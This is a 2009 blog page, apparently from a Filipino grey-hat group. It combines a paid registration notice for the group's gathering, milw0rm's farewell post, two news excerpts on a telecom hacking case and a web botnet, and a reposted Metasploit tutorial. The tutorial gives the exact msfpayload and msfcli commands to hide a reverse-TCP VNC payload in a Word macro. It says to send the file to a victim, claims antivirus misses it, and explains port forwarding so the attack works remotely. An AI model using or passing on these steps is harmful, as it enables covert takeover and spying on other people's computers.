PinoyGreyHat Gathering 2009

Registration now open. See details

Pay less register with the Early Registration promo. Registration for 100 slots is now open.

Early Registration = Php1500.00 (Note:Open until November 13, 2009)

Late Registration = Php2000.00 (Note:November 13 until December 05 2009 will be considered late registration)

At the DoorStep = Php2500.00 (Note:We will only be accepting 20 slots for DoorStep registration)

Student Registration = Php1000.00 (Note:Only 10 slots of students are available)

Registration Inclusion:

• Food (PM snack and dinner)
• Of Course: The Booze

To Register

We depreciated the use of web forms on the registration. We will only be accepting direct deposit. This will let the crew manually monitor the registration.

Steps on Direct Deposit

- We will be accepting direct deposit only.

• Step 1. Deposit the payment through any ChinaBank branches on account number 2030397914 account name Louella Labrador.
• Step 2. After confirming the payment, get the transaction number and send an email to registration[at]pinoygreyhat dot org, with the following format.
  Subject: PinoyGreyHat Gathering 2009: Payment
  Body:
  Name or Handle:
  Email Address:
  Mobile Phone Number:
  Payment Transaction Number:
  
• Step 3. Wait for the email from the mailman to get the booze coupon

After sending an email to the registration mailman, the PinoyGreyHat crew will be verifying your payment, after verification you will be receiving a payment code with the instruction how to get your booze coupon. Anyone who wish to get their badge on the date of the CON, please remember to bring your payment code.

Frequently Ask Questions

Why is the payment being increased?

The place holder of BeerTalk 2(Grilla) is a bit small and literally hot, so we decided to get a more bigger, cooler place. Bayview Hotel is a 3 star hotel which is a bit expensive.

Are we going to receive certificates?

No! This is a greyhat gathering not a training class.

Are you going to give an official receipt?

PinoyGreyHat will only be giving a statement of account, signed by the officer.

The rest of the FAQ are posted on the FAQ page.

Submissions are closed! (milw0rm.com)

Well, this is my goodbye header for milw0rm. I wish I had the time I did in the past to post exploits, I just don't :(. For the past 3 months I have actually done a pretty crappy job of getting peoples work out fast enough to be proud of, 0 to 72 hours (taking off weekends) isn't fair to the authors on this site. I appreciate and thank everyone for their support in the past.

Be safe, /str0ke

Goodbye milw0rm!

Police say hacker stole phone time from AT&T, others

IDG News Service - An Italian magistrate has issued an international arrest warrant for a Filipino hacker suspected of causing millions of dollars of losses to telecommunications multinationals, and Italian police have arrested five Pakistani nationals accused of exploiting the hacker's work to defraud the telecom companies, officials in the northern city of Brescia said Friday.

The Filipino hacker allegedly penetrated the IT systems belonging to customers of major telephone companies, including AT&T, to steal access codes for international phone calls that he then sold to the group of Italy-based Pakistanis who ran a network of public phone centers. Police declined to identify the hacker by name, saying only that he was a 27-year-old male living in the Philippines.

Read more here.

Metasploit: Reverse VNC hidden in a Word file

Credits goes to Punter of forum.darkc0de.com

Today i will show u how to use Metasploit payload feature for Reverse VNC connection which can be hidden in a Word file and get VNC desktop of the remote user

Metasploit will create a macro for Word, which once implemented when a user opens the word file we get a reverse VNC of the target system ,where the Word file contains the macro, even antvirus cant detect it,

there is no required of VNC installed in the Victim PC
u can also do this in WAN also only thing is u should port forward ur 4444 port in ur modem or router

Lets begin

1) Create a Macro to Intergate with word

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.147.128 V > /tmp/punter.bas

2) copy that punter.bas file in windows now go to windows
and open ur office 2003 –>tools–>macro–>visualbasic editor
then go to File–>import file–> and choose the punter.bas and save it with a name ex: macrogame.doc
now send this file to victim via mail or some other technique for this demo i will open in my system

3)now in Backtrack type this command

./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.147.128 DisableCourtesyShell=True E

When the target on the windows open the file, it will be asked if he/she wished to accept or not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.
not run the macro, if it accepts, the connection will be initiated, and the VNC client will open on the post BackTrack.

Video link for the above guide

http://blip.tv/file/1847504

http://wirelesspunter.blip.tv

Nice work Punter!

Viral web infection siphons ad dollars from Google

A compromise that is moving virally across websites is making unwitting people who surf to them part of a botnet that redirects Google search results, a security researcher has warned.

During the past week, the number of websites identified as infected have almost tripled, according to researcher Mary Landesman with real-time malware scanning specialist ScanSafe tracking the attacks since March. Normally, web compromises die out after a few weeks, as search engines and anti-virus programs grow wise to them. But that's not happening this time.

Read more.